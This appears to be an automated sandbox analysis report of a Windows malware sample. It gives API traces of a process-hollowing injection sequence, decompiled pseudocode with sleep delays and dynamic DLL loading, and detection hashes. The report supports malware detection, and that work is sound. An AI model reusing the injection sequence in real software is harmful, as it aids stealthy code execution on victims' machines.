VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02DE0283
GetThreadContext.KERNELBASE(00000000,?), ref: 02DE029F
ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 02DE02C8
NtUnmapViewOfSection.NTDLL(00000000,?), ref: 02DE02E3
VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 02DE0304
NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 02DE032A
NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 02DE0399
WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 02DE03BF
SetThreadContext.KERNELBASE(00000000,?), ref: 02DE03E1
ResumeThread.KERNELBASE(00000000), ref: 02DE03ED
ExitProcess.KERNEL32(00000000), ref: 02DE0412

Memory Dump Source

Source File: 00000001.00000002.253815632.0000000002DE0000.00000040.00000001.sdmp, Offset: 02DE0000, based on PE: false

Similarity

API ID: Virtual$MemoryProcess$AllocThreadWrite$Context$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
String ID:
API String ID: 2875986403-0
Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction ID: 1d0d92d9babf4f1ced303fb9301c1f0a1846efba465aa4eb87faf35397cb99a0
Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction Fuzzy Hash: 14B1C774A00208AFDB44CF98C895F9EBBB5FF88314F248158E949AB395D771AE41CF94

Uniqueness

Uniqueness Score: -1.00%

Function 02DE0420, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 02DE0533

Strings

0, xrefs: 02DE0492
d, xrefs: 02DE0584
mfoaskdfnoa, xrefs: 02DE0520, 02DE0523
saodkfnosa9uin, xrefs: 02DE04DA

Memory Dump Source

Source File: 00000001.00000002.253815632.0000000002DE0000.00000040.00000001.sdmp, Offset: 02DE0000, based on PE: false

Similarity

API ID: CreateWindow
String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
API String ID: 716092398-2341455598
Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction ID: 9dfebea6b5f217932670485359a87a260858724888ecb3da504f93cebf03d943
Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction Fuzzy Hash: 2F510670D08388DAEF11DBA8C849B9DBFB2AF15708F144058D5457F2C6C3FA5A58CB66

Uniqueness

Uniqueness Score: -1.00%

Function 02DE05B0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(apfHQ), ref: 02DE05EC

Strings

apfHQ, xrefs: 02DE05E2, 02DE05E5
o, xrefs: 02DE0600

Memory Dump Source

Source File: 00000001.00000002.253815632.0000000002DE0000.00000040.00000001.sdmp, Offset: 02DE0000, based on PE: false

Similarity

API ID: AttributesFile
String ID: apfHQ$o
API String ID: 3188754299-2999369273
Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction ID: 0a1d01e4aeadc480ff7a5c07682a66339e3a6c82b73215599219c34397e7d72a
Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction Fuzzy Hash: 7301E9B0C0429CEADF11EB98C5183AEBFB5AB41309F148099C4492B341D7B69B58CBA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02DE0042, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.253815632.0000000002DE0000.00000040.00000001.sdmp, Offset: 02DE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 35c48a136e6f10f3268a4a0525bfc1e2684dbbfade68296180b87009ef7e0c02
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 7B117C72340100AFEB54EE65DCD0EA673EAEB88321B298165E909DB351D6B6EC01CB60

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: GzsKHwvBmG.exe PID: 4440 Parent PID: 5600 GzsKHwvBmG.exeCOMMON

Executed Functions

Function 0040197F, Relevance: 3.1, APIs: 2, Instructions: 54
sleepnativeCOMMON

Download Yara Rule

C-Code - Quality: 18%

			E0040197F(void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t8;
				void* _t11;
				intOrPtr _t13;
				intOrPtr* _t16;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr* _t22;
				void* _t23;
				intOrPtr* _t24;

				_t26 = __eflags;
				asm("out dx, eax");
				_push(0x19bb);
				_t8 =  *_t22;
				_t23 = _t22 + 4;
				asm("repne sub eax, 0xfff904e8");
				_push(0x62);
				_t24 = _t23 + 4;
				E004012BF(_t8, _t19, _t20, _t21, __eflags);
				_t16 = _a4;
				Sleep(0x1388);
				_push( &_v8);
				_push(_a12);
				_push(_a8);
				_push(_t16); // executed
				_t11 = E00401502(_t16, _t19, _t20, _t21, _t26); // executed
				_t27 = _t11;
				if(_t11 != 0) {
					_push(_a16);
					_push(_v8);
					_push(_t11);
					_push(_t16); // executed
					L004015D3(_t16, _t19, _t20, _t21, _t27); // executed
				}
				 *_t16(0xffffffff, 0); // executed
				_push(0x19bb);
				_t13 =  *_t24;
				return E004012BF(_t13, _t19, _t20, _t21, _t27);
			}

0x0040197f
0x0040199f
0x0040198f
0x00401994
0x00401997
0x004019b4
0x004019a7
0x004019ac
0x004019b6
0x004019bb
0x004019c3
0x004019c9
0x004019ca
0x004019cd
0x004019d0
0x004019d1
0x004019d6
0x004019d8
0x004019da
0x004019dd
0x004019e0
0x004019e1
0x004019e2
0x004019e2
0x004019eb
0x004019f3
0x004019f8
0x00401a21

APIs

Sleep.KERNELBASE(00001388,00000062), ref: 004019C3
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019EB

Memory Dump Source

Source File: 00000003.00000002.308145383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: bcb473a80559007bb28423a92ef8681f65ebbcb398205737adca3c99fe595efc
Instruction ID: 57e3c6fabe06a165ad46eb134568508f3e71a46e85a60e7e826126cb482f7349
Opcode Fuzzy Hash: bcb473a80559007bb28423a92ef8681f65ebbcb398205737adca3c99fe595efc
Instruction Fuzzy Hash: 1601D8B1708204F7DB00AB959E92D7A3329AF41710F204137BA43791E1D63D9D22EB6B

Uniqueness

Uniqueness Score: -1.00%

Function 004019B1, Relevance: 3.1, APIs: 2, Instructions: 54
sleepnativeCOMMON

Download Yara Rule

C-Code - Quality: 23%

			E004019B1(void* __edi, void* __esi, void* __eflags) {
				void* _t8;
				void* _t11;
				intOrPtr _t13;
				intOrPtr* _t16;
				void* _t20;
				void* _t25;
				void* _t27;
				intOrPtr* _t28;

				_t31 = __eflags;
				_t23 = __esi;
				_t21 = __edi;
				asm("in al, dx");
				if (__eflags != 0) goto 0x40199f;
				asm("repne sub eax, 0xfff904e8");
				_push(0x62);
				_t28 = _t27 + 4;
				E004012BF(_t8, _t20, __edi, __esi, __eflags);
				_t16 =  *((intOrPtr*)(_t25 + 8));
				Sleep(0x1388);
				_push(_t25 - 4);
				_push( *((intOrPtr*)(_t25 + 0x10)));
				_push( *((intOrPtr*)(_t25 + 0xc)));
				_push(_t16); // executed
				_t11 = E00401502(_t16, _t20, _t21, __esi, _t31); // executed
				_t32 = _t11;
				if(_t11 != 0) {
					_push( *((intOrPtr*)(_t25 + 0x14)));
					_push( *((intOrPtr*)(_t25 - 4)));
					_push(_t11);
					_push(_t16); // executed
					L004015D3(_t16, _t20, _t21, _t23, _t32); // executed
				}
				 *_t16(0xffffffff, 0); // executed
				_push(0x19bb);
				_t13 =  *_t28;
				return E004012BF(_t13, _t20, _t21, _t23, _t32);
			}

0x004019b1
0x004019b1
0x004019b1
0x004019b1
0x004019b2
0x004019b4
0x004019a7
0x004019ac
0x004019b6
0x004019bb
0x004019c3
0x004019c9
0x004019ca
0x004019cd
0x004019d0
0x004019d1
0x004019d6
0x004019d8
0x004019da
0x004019dd
0x004019e0
0x004019e1
0x004019e2
0x004019e2
0x004019eb
0x004019f3
0x004019f8
0x00401a21

APIs

Sleep.KERNELBASE(00001388,00000062), ref: 004019C3
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019EB

Memory Dump Source

Source File: 00000003.00000002.308145383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: cbd6cf45c0b53524ac5aa4dd2f83136c209037899838eeeb919ebb42b7f8e0e9
Instruction ID: 7f18fd79f6fc81d1aacc7b9178c151b85e6c9e578e0c4c1d9390a1e0af9d8492
Opcode Fuzzy Hash: cbd6cf45c0b53524ac5aa4dd2f83136c209037899838eeeb919ebb42b7f8e0e9
Instruction Fuzzy Hash: A101D671204200EBDB019FA9DD95DA93726EF41310F10027BB503BA1E2D63D9A16EB27

Uniqueness

Uniqueness Score: -1.00%

Function 0040198A, Relevance: 3.0, APIs: 2, Instructions: 48
sleepnativeCOMMON

Download Yara Rule

C-Code - Quality: 20%

			E0040198A(void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t8;
				void* _t11;
				intOrPtr _t13;
				intOrPtr* _t16;
				void* _t20;
				void* _t25;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t32 = __eflags;
				_t23 = __esi;
				_t21 = __edi;
				asm("std");
				asm("lds ebp, [ebp+0x19bb684d]");
				_push(0x19bb);
				_t8 =  *_t27;
				_t28 = _t27 + 4;
				asm("repne sub eax, 0xfff904e8");
				_push(0x62);
				_t29 = _t28 + 4;
				E004012BF(_t8, _t20, __edi, __esi, __eflags);
				_t16 =  *((intOrPtr*)(_t25 + 8));
				Sleep(0x1388);
				_push(_t25 - 4);
				_push( *((intOrPtr*)(_t25 + 0x10)));
				_push( *((intOrPtr*)(_t25 + 0xc)));
				_push(_t16); // executed
				_t11 = E00401502(_t16, _t20, _t21, __esi, _t32); // executed
				_t33 = _t11;
				if(_t11 != 0) {
					_push( *((intOrPtr*)(_t25 + 0x14)));
					_push( *((intOrPtr*)(_t25 - 4)));
					_push(_t11);
					_push(_t16); // executed
					L004015D3(_t16, _t20, _t21, _t23, _t33); // executed
				}
				 *_t16(0xffffffff, 0); // executed
				_push(0x19bb);
				_t13 =  *_t29;
				return E004012BF(_t13, _t20, _t21, _t23, _t33);
			}

0x0040198a
0x0040198a
0x0040198a
0x0040198a
0x0040198c
0x0040198f
0x00401994
0x00401997
0x004019b4
0x004019a7
0x004019ac
0x004019b6
0x004019bb
0x004019c3
0x004019c9
0x004019ca
0x004019cd
0x004019d0
0x004019d1
0x004019d6
0x004019d8
0x004019da
0x004019dd
0x004019e0
0x004019e1
0x004019e2
0x004019e2
0x004019eb
0x004019f3
0x004019f8
0x00401a21

APIs

Sleep.KERNELBASE(00001388,00000062), ref: 004019C3
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019EB

Memory Dump Source

Source File: 00000003.00000002.308145383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: ccfb191151a767bdc9cbe4523c07d0d7ed4776b2de0f136642fab053b244c2bf
Instruction ID: a72ed57d07a02d256bd32122d7544ea4cc166053f19893fffcfb0d55415ced24
Opcode Fuzzy Hash: ccfb191151a767bdc9cbe4523c07d0d7ed4776b2de0f136642fab053b244c2bf
Instruction Fuzzy Hash: 0701A771608204EBDB01AF94DD92D6E3365AF41314F204177B943791E1C63D9E22EB6B

Uniqueness

Uniqueness Score: -1.00%

Function 0040199C, Relevance: 3.0, APIs: 2, Instructions: 48
sleepnativeCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E0040199C(void* __ecx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _t8;
				void* _t11;
				intOrPtr _t13;
				intOrPtr* _t16;
				void* _t26;
				intOrPtr* _t28;
				void* _t29;
				intOrPtr* _t30;
				void* _t33;

				_t24 = __esi;
				_t22 = __edi;
				_t21 = __edx;
				_t33 = __edx - __ecx;
				asm("out dx, eax");
				_push(0x19bb);
				_t8 =  *_t28;
				_t29 = _t28 + 4;
				asm("repne sub eax, 0xfff904e8");
				_push(0x62);
				_t30 = _t29 + 4;
				E004012BF(_t8, __edx, __edi, __esi, _t33);
				_t16 =  *((intOrPtr*)(_t26 + 8));
				Sleep(0x1388);
				_push(_t26 - 4);
				_push( *((intOrPtr*)(_t26 + 0x10)));
				_push( *((intOrPtr*)(_t26 + 0xc)));
				_push(_t16); // executed
				_t11 = E00401502(_t16, _t21, _t22, __esi, _t33); // executed
				_t34 = _t11;
				if(_t11 != 0) {
					_push( *((intOrPtr*)(_t26 + 0x14)));
					_push( *((intOrPtr*)(_t26 - 4)));
					_push(_t11);
					_push(_t16); // executed
					L004015D3(_t16, _t21, _t22, _t24, _t34); // executed
				}
				 *_t16(0xffffffff, 0); // executed
				_push(0x19bb);
				_t13 =  *_t30;
				return E004012BF(_t13, _t21, _t22, _t24, _t34);
			}

0x0040199c
0x0040199c
0x0040199c
0x0040199c
0x0040199f
0x0040198f
0x00401994
0x00401997
0x004019b4
0x004019a7
0x004019ac
0x004019b6
0x004019bb
0x004019c3
0x004019c9
0x004019ca
0x004019cd
0x004019d0
0x004019d1
0x004019d6
0x004019d8
0x004019da
0x004019dd
0x004019e0
0x004019e1
0x004019e2
0x004019e2
0x004019eb
0x004019f3
0x004019f8
0x00401a21

APIs

Sleep.KERNELBASE(00001388,00000062), ref: 004019C3
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019EB

Memory Dump Source

Source File: 00000003.00000002.308145383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 4fb5e9a5afbf0bb0d8b1c466ddce95a75c30193c24937f166a7f97c6bea3c0da
Instruction ID: 38790f97698b8fbd236dc93497c28a5a48dbceb78932be0dbcbbb6d4f4f3ee68
Opcode Fuzzy Hash: 4fb5e9a5afbf0bb0d8b1c466ddce95a75c30193c24937f166a7f97c6bea3c0da
Instruction Fuzzy Hash: F1014471708204E7DB019A959D92E6A3365AB41710F204177BA43791E1C63E9A22EB5B

Uniqueness

Uniqueness Score: -1.00%

Function 004019A0, Relevance: 3.0, APIs: 2, Instructions: 43
sleepnativeCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E004019A0(void* __edi, void* __esi, void* __eflags) {
				void* _t8;
				void* _t11;
				intOrPtr _t13;
				intOrPtr* _t16;
				void* _t20;
				void* _t25;
				void* _t27;
				intOrPtr* _t28;

				_t31 = __eflags;
				_t23 = __esi;
				_t21 = __edi;
				asm("sbb ebx, ebp");
				asm("repne sub eax, 0xfff904e8");
				_push(0x62);
				_t28 = _t27 + 4;
				E004012BF(_t8, _t20, __edi, __esi, __eflags);
				_t16 =  *((intOrPtr*)(_t25 + 8));
				Sleep(0x1388);
				_push(_t25 - 4);
				_push( *((intOrPtr*)(_t25 + 0x10)));
				_push( *((intOrPtr*)(_t25 + 0xc)));
				_push(_t16); // executed
				_t11 = E00401502(_t16, _t20, _t21, __esi, _t31); // executed
				_t32 = _t11;
				if(_t11 != 0) {
					_push( *((intOrPtr*)(_t25 + 0x14)));
					_push( *((intOrPtr*)(_t25 - 4)));
					_push(_t11);
					_push(_t16); // executed
					L004015D3(_t16, _t20, _t21, _t23, _t32); // executed
				}
				 *_t16(0xffffffff, 0); // executed
				_push(0x19bb);
				_t13 =  *_t28;
				return E004012BF(_t13, _t20, _t21, _t23, _t32);
			}

0x004019a0
0x004019a0
0x004019a0
0x004019a0
0x004019b4
0x004019a7
0x004019ac
0x004019b6
0x004019bb
0x004019c3
0x004019c9
0x004019ca
0x004019cd
0x004019d0
0x004019d1
0x004019d6
0x004019d8
0x004019da
0x004019dd
0x004019e0
0x004019e1
0x004019e2
0x004019e2
0x004019eb
0x004019f3
0x004019f8
0x00401a21

APIs

Sleep.KERNELBASE(00001388,00000062), ref: 004019C3
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019EB

Memory Dump Source

Source File: 00000003.00000002.308145383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: a3f083826976df0a3047c0ccb3ceba760f639657c05e2c9146095c379659a445
Instruction ID: 9c9c3dab28d51d6fb39e7a0de955185f52c78c5ab62663713faf9a931d33ce0c
Opcode Fuzzy Hash: a3f083826976df0a3047c0ccb3ceba760f639657c05e2c9146095c379659a445
Instruction Fuzzy Hash: 8EF08171308204E7DB01AF959D96EAE3725AF41310F20427BBA43791E1C63D8922EB27

Uniqueness

Uniqueness Score: -1.00%

Function 00402833, Relevance: 1.5, APIs: 1, Instructions: 47
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00402833(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				struct _OBJDIR_INFORMATION _v8;
				char _v16;
				void* __edi;
				void* __esi;
				long _t12;
				intOrPtr _t16;
				void* _t18;
				void* _t20;
				void* _t21;
				void* _t23;
				UNICODE_STRING* _t24;
				void* _t29;

				_t18 = 0x50;
				E004012BF(0x2866, _t20, _t21, _t23, __eflags);
				_t16 = _a4;
				_t24 =  &_v16;
				 *((intOrPtr*)(_t16 + 0xc))(_t24, _a8);
				_t22 =  &_v8;
				_t12 = LdrLoadDll(0, 0, _t24,  &_v8);
				if(_t12 != 0) {
					_v8 = 0;
					 *_t12 =  *_t12 + _t12;
					_t29 = _t16 + _t18;
				}
				_push(0x50);
				E004012BF(0x2866, _t20, _t22, _t24, _t29);
				return;
				 *__eax =  *__eax | __al;
				__eflags =  *__eax;
			}

0x00402859
0x00402861
0x00402866
0x00402869
0x00402870
0x00402873
0x0040287c
0x00402881
0x00402883
0x00402887
0x00402889
0x00402889
0x004028a2
0x004028b1
0x004028bd
0x004028be
0x004028be

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 0040287C

Memory Dump Source

Source File: 00000003.00000001.253008059.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: d3b7aecea01661a86e3db51f4a332d5127bb1bf677a26cfddb38f6fb5e6c280c
Instruction ID: 6d79a031cfae5ef0c8a5519a1d9066b2e4febc8340f52af7eaa1c07cf73054f2
Opcode Fuzzy Hash: d3b7aecea01661a86e3db51f4a332d5127bb1bf677a26cfddb38f6fb5e6c280c
Instruction Fuzzy Hash: 2D01A23F608514E7D700BA818F8DF6A7728EB00744F20C23BA5067A1C0C5FC9A07A7AB

Uniqueness

Uniqueness Score: -1.00%

Function 00402832, Relevance: 1.5, APIs: 1, Instructions: 47
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402832(void* __edx) {
				void* _t4;

				 *((intOrPtr*)(_t4 - 0x77)) =  *((intOrPtr*)(_t4 - 0x77)) + __edx;
			}

0x00402832

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 0040287C

Memory Dump Source

Source File: 00000003.00000001.253008059.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: bd0d0221e89f1bd5600315b017dfdb78eb89c3f8ffbbde4dfa4dadf4d1566308
Instruction ID: c1d3c28cec5361f34fe40aade0f735c733add82a0e629b7f1f5a854fdfd1091d
Opcode Fuzzy Hash: bd0d0221e89f1bd5600315b017dfdb78eb89c3f8ffbbde4dfa4dadf4d1566308
Instruction Fuzzy Hash: 5101843B509515E7DB00B6918A8CB9A7725AB01704F30C27BE5067A1C0C5BC8603A75B

Uniqueness

Uniqueness Score: -1.00%

Function 0040283E, Relevance: 1.5, APIs: 1, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040283E(signed int __eax, void* __edi, void* __esi) {
				long _t14;
				intOrPtr _t18;
				void* _t21;
				void* _t23;
				UNICODE_STRING* _t28;
				void* _t30;
				signed int _t35;
				void* _t37;

				_t35 = __eax & 0x21d46e37;
				_t21 = 0x50;
				E004012BF(0x2866, _t23, __edi, __esi, _t35);
				_t18 =  *((intOrPtr*)(_t30 + 8));
				_t28 = _t30 - 0xc;
				 *((intOrPtr*)(_t18 + 0xc))(_t28,  *((intOrPtr*)(_t30 + 0xc)));
				_t25 = _t30 - 4;
				_t14 = LdrLoadDll(0, 0, _t28, _t30 - 4);
				if(_t14 != 0) {
					 *(_t30 - 4) = 0;
					 *_t14 =  *_t14 + _t14;
					_t37 = _t18 + _t21;
				}
				_push(0x50);
				E004012BF(0x2866, _t23, _t25, _t28, _t37);
				return;
				 *__eax =  *__eax | __al;
				__eflags =  *__eax;
			}

0x0040283e
0x00402859
0x00402861
0x00402866
0x00402869
0x00402870
0x00402873
0x0040287c
0x00402881
0x00402883
0x00402887
0x00402889
0x00402889
0x004028a2
0x004028b1
0x004028bd
0x004028be
0x004028be

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 0040287C

Memory Dump Source

Source File: 00000003.00000001.253008059.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 26bb8197d784bcd16178476f2396128a9f74258dfb60cbb618a8b109243d3b1e
Instruction ID: b93627e62bddc1e945834adad672a4be7f8a0e18442c020bd357d50e3e510e6b
Opcode Fuzzy Hash: 26bb8197d784bcd16178476f2396128a9f74258dfb60cbb618a8b109243d3b1e
Instruction Fuzzy Hash: C0F0443F608515E7DB00BA81CB8DB5D7725AB00715F24C27BA5067A1C0C6BC9A07A79B

Uniqueness

Uniqueness Score: -1.00%

Function 00402851, Relevance: 1.5, APIs: 1, Instructions: 38
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00402851(void* __eax, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				long _t14;
				intOrPtr _t18;
				void* _t23;
				void* _t25;
				UNICODE_STRING* _t30;
				void* _t32;
				void* _t34;
				void* _t39;

				asm("repe adc bl, [ebx+0x33]");
				_t23 = 0x50;
				E004012BF(__ecx, _t25, __edi, __esi, __eflags);
				_t18 =  *((intOrPtr*)(_t32 + 8));
				_t30 = _t32 - 0xc;
				 *((intOrPtr*)(_t18 + 0xc))(_t30,  *((intOrPtr*)(_t32 + 0xc)), _t34);
				_t27 = _t32 - 4;
				_t14 = LdrLoadDll(0, 0, _t30, _t32 - 4);
				if(_t14 != 0) {
					 *(_t32 - 4) = 0;
					 *_t14 =  *_t14 + _t14;
					_t39 = _t18 + _t23;
				}
				_push(0x50);
				E004012BF(0x2866, _t25, _t27, _t30, _t39);
				return;
				 *__eax =  *__eax | __al;
				__eflags =  *__eax;
			}

0x00402853
0x00402859
0x00402861
0x00402866
0x00402869
0x00402870
0x00402873
0x0040287c
0x00402881
0x00402883
0x00402887
0x00402889
0x00402889
0x004028a2
0x004028b1
0x004028bd
0x004028be
0x004028be

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 0040287C

Memory Dump Source

Source File: 00000003.00000001.253008059.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 82c0eda2367e46cd8c316efef0d29ce46445f05636bd564225ea7bcdf7d38fd8
Instruction ID: 0761289169a009ba20ec097ad61d7523081ea0748a0bcd169cb1fb4883454dfa
Opcode Fuzzy Hash: 82c0eda2367e46cd8c316efef0d29ce46445f05636bd564225ea7bcdf7d38fd8
Instruction Fuzzy Hash: 18F0C83B604114E6DB00BA91CE4DF9D7724AF00715F24C17BE5057E1C1C6BC96069797

Uniqueness

Uniqueness Score: -1.00%

Function 0040285C, Relevance: 1.5, APIs: 1, Instructions: 37
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040285C(void* __edi, void* __esi, void* __eflags) {
				void* _t9;
				long _t12;
				intOrPtr _t16;
				void* _t19;
				void* _t21;
				UNICODE_STRING* _t26;
				void* _t28;
				void* _t35;

				asm("aad 0x9b");
				_t19 = 0x50;
				E004012BF(_t9, _t21, __edi, __esi, __eflags);
				_t16 =  *((intOrPtr*)(_t28 + 8));
				_t26 = _t28 - 0xc;
				 *((intOrPtr*)(_t16 + 0xc))(_t26,  *((intOrPtr*)(_t28 + 0xc)));
				_t23 = _t28 - 4;
				_t12 = LdrLoadDll(0, 0, _t26, _t28 - 4);
				if(_t12 != 0) {
					 *(_t28 - 4) = 0;
					 *_t12 =  *_t12 + _t12;
					_t35 = _t16 + _t19;
				}
				_push(0x50);
				E004012BF(0x2866, _t21, _t23, _t26, _t35);
				return;
				 *__eax =  *__eax | __al;
				__eflags =  *__eax;
			}

0x0040285c
0x00402859
0x00402861
0x00402866
0x00402869
0x00402870
0x00402873
0x0040287c
0x00402881
0x00402883
0x00402887
0x00402889
0x00402889
0x004028a2
0x004028b1
0x004028bd
0x004028be
0x004028be

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 0040287C

Memory Dump Source

Source File: 00000003.00000001.253008059.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: babfa762f8e8a1799c9aa14be743af1b3753140ab4f0e9a158ff8061da8e7159
Instruction ID: 9afdc3148e343a4e9b9426b5be11f1c99e543a4768c86cfab2b2411e66a3e7fc
Opcode Fuzzy Hash: babfa762f8e8a1799c9aa14be743af1b3753140ab4f0e9a158ff8061da8e7159
Instruction Fuzzy Hash: 22F0623B604115E6DB00BA818E8DB9E7721AF00705F24C27BA9067A1C0C6BC9606A79B

Uniqueness

Uniqueness Score: -1.00%

Function 00402860, Relevance: 1.5, APIs: 1, Instructions: 31
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00402860(void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t9;
				long _t12;
				intOrPtr _t16;
				void* _t19;
				void* _t21;
				UNICODE_STRING* _t26;
				void* _t28;
				void* _t35;

				_t19 = __ecx;
				0x8bff();
				E004012BF(_t9, _t21, __edi, __esi, __eflags);
				_t16 =  *((intOrPtr*)(_t28 + 8));
				_t26 = _t28 - 0xc;
				 *((intOrPtr*)(_t16 + 0xc))(_t26,  *((intOrPtr*)(_t28 + 0xc)));
				_t23 = _t28 - 4;
				_t12 = LdrLoadDll(0, 0, _t26, _t28 - 4);
				if(_t12 != 0) {
					 *(_t28 - 4) = 0;
					 *_t12 =  *_t12 + _t12;
					_t35 = _t16 + _t19;
				}
				_push(0x50);
				E004012BF(0x2866, _t21, _t23, _t26, _t35);
				return;
				 *__eax =  *__eax | __al;
				__eflags =  *__eax;
			}

0x00402860
0x00402860
0x00402861
0x00402866
0x00402869
0x00402870
0x00402873
0x0040287c
0x00402881
0x00402883
0x00402887
0x00402889
0x00402889
0x004028a2
0x004028b1
0x004028bd
0x004028be
0x004028be

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 0040287C

Memory Dump Source

Source File: 00000003.00000001.253008059.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: ebc7a2ed0e359061905eb251324ba831bec977679986994c7cee3dfe47ebcc92
Instruction ID: 083efa169743864912c74b5fe8aa7a2d721072b0ec86fe9330e68dc554057cd7
Opcode Fuzzy Hash: ebc7a2ed0e359061905eb251324ba831bec977679986994c7cee3dfe47ebcc92
Instruction Fuzzy Hash: 70F0E23B204204E3EB00BA819A4DB5E7724AF41711F24C17BD802BD1C0C6B88902A75B

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00402648, Relevance: .2, Instructions: 165
COMMONCrypto

Download Yara Rule

C-Code - Quality: 23%

			E00402648(signed char __edx, void* __eflags) {
				void* _v3;
				void* __edi;
				void* __esi;
				void* _t19;
				signed char _t20;
				signed int _t25;
				signed char _t27;
				void* _t32;
				signed char _t33;
				signed char _t37;
				void* _t38;
				signed int* _t40;
				signed char _t43;
				signed char _t45;
				void* _t46;
				signed int _t48;
				signed int _t53;
				void* _t55;
				void* _t63;
				signed int _t65;
				signed int* _t69;
				void* _t70;
				signed int** _t85;
				void* _t99;
				signed int _t107;

				_t99 = __eflags;
				_t43 = __edx;
				do {
					_t19 = 0x2687;
					_push(0x1a2);
					_t40 =  *_t85;
					_t85 =  &(_t85[1]);
					_t20 = E004012BF(_t19, _t43, _t63, _t69, _t99);
					asm("int1");
				} while (_t99 >= 0);
				asm("aaa");
				asm("fidiv word [ss:esi]");
				_t33 = _t32 + 1;
